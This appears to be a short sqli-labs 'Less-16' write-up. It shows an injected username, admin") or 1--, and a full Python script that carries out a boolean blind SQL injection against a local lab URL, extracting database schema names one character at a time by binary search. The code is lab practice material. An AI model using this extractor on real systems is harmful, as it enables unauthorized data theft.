通過嘗試 , 構造如下的用戶名 :
admin") or 1--

#!/usr/bin/env python
# encoding:utf8

import requests
import time
import sys

# config-start
sleep_time = 5
error_time = 1
# config-end

def getPayload(indexOfResult, indexOfChar, mid):
    # admin' or ()-- 
    column_name="schema_name"
    table_name="schemata"
    database_name="information_schema"
    payload = "((ascii(substring((select " + column_name + " from " + database_name + "." + table_name + "  limit " + indexOfResult + ",1)," + indexOfChar + ",1)))>" + mid + ")"
    payload = {"uname":"\") or (" + payload + ")-- ","passwd":"admin"}
    return payload

def exce(indexOfResult,indexOfChar,mid):
    # content-start
    url = "http://127.0.0.1/Less-16/"
    postData = getPayload(indexOfResult,indexOfChar,mid)
    content = requests.post(url, data=postData).text
    # content-end
    # judge-start
    if "flag.jpg" in content:
        return True
    else:
        return False
    # judge-end

def doubleSearch(indexOfResult,indexOfChar,left_number, right_number):
    while left_number < right_number:
        mid = int((left_number + right_number) / 2)
        if exce(str(indexOfResult),str(indexOfChar + 1),str(mid)):
            left_number = mid
        else:
            right_number = mid
        if left_number == right_number - 1:
            if exce(str(indexOfResult),str(indexOfChar + 1),str(mid)):
                mid += 1
                break
            else:
                break
    return chr(mid)

def search():
    for i in range(32): # 需要遍歷的查詢結果的數(shù)量
        counter = 0
        for j in range(32): # 結果的長度
            counter += 1
            temp = doubleSearch(i, j, 0, 128) # 從255開始查詢
            if ord(temp) == 1: # 當為1的時候說明已經(jīng)查詢結束
                break
            sys.stdout.write(temp)
            sys.stdout.flush()
        if counter == 1: # 當結果集的所有行都被遍歷后退出
            break
        sys.stdout.write("\r\n")
        sys.stdout.flush()

search()